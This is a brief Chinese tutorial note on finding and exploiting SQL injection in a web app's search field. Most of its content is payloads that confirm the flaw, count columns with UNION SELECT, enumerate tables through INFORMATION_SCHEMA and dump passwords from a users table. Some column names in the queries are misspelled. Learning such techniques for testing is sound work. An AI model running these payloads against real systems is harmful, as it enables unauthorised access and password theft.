测试web应用程序搜索SQL注入漏洞

1.简单的SQL注入(select colunmns from table where criteria='')

  在搜索框中输入 ' 然后单击,查看SQL错误信息,如果返回错误信息说明出现未匹配的单引号,结构破坏

 输入:' or 1=1#'(数据库的注释方式很多包括--。#。//)

 2.查询列表中有多少列

   ' union select null #'  合并一列

   'union select null,null #'  合并两列     直到合并查询出列数

3.查询表明(数据库有一个特殊对象INFORMATION_SCHEMA,这个对象包含了每张表的名称,字段,元素)

   'union select null,table_name from INFORMATION_SCHEMA.tables#'

4,查询表字段名称

  'union select null,colunmn_name from INFORMATION_SCHEMA.colunmns  where table_name='users '#'

5,查询重要字段名称数据

'union select null,password  from users#'  根据得到的字段名称和表名称,可以查询出数据

6,把查询出的数据和用户列表进行交叉使用

 'union select password,concat(first_name,'',last_name,'',user)  from users

你可能感兴趣的:(理论知识)